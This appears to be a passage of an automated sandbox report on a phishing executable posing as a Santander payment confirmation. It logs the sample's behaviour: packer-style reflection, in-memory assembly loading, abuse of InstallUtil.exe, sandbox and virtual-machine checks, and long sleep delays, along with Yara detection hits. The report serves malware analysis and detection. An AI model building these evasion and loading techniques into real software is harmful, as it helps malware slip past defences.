                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1576725585.0000000005C70000.00000004.08000000.00040000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.000000000434F000.00000004.00000800.00020000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.00000000043C7000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1576725585.0000000005C70000.00000004.08000000.00040000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.000000000434F000.00000004.00000800.00020000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.00000000043C7000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, IterableCompiler.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, DetailedChain.cs.Net Code: DisconnectControllableChain System.AppDomain.Load(byte[])
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6e00000.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6e00000.6.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6e00000.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6e00000.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6e00000.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.4e20000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6ed0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.InstallUtil.exe.364d898.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1563050163.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1579828371.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2416969723.0000000004E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kopia platnosci_Santander_TF1903218545300000564290004.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6968, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030743BF pushfd ; ret 5_2_030743CA
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030743CB pushfd ; ret 5_2_030743DA
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030743DB pushfd ; ret 5_2_030743EA
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5C0B3 push ds; ret 5_2_05C5C0D2
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5FB7C pushad ; iretd 5_2_05C5FB7D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA16F2 push 8BD88B6Eh; retf 10_2_04DA16F7
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Kopia platnosci_Santander_TF1903218545300000564290004.exe PID: 7152, type: MEMORYSTR
                    Yara detected ZipBomb
                    Source: Yara matchFile source: Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip, type: SAMPLE
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeWindow / User API: threadDelayed 9709Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 9857Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99889s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6212Thread sleep count: 9709 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99777s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6288Thread sleep count: 138 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe TID: 6232Thread sleep time: -99666s >= -30000sJump to behavior
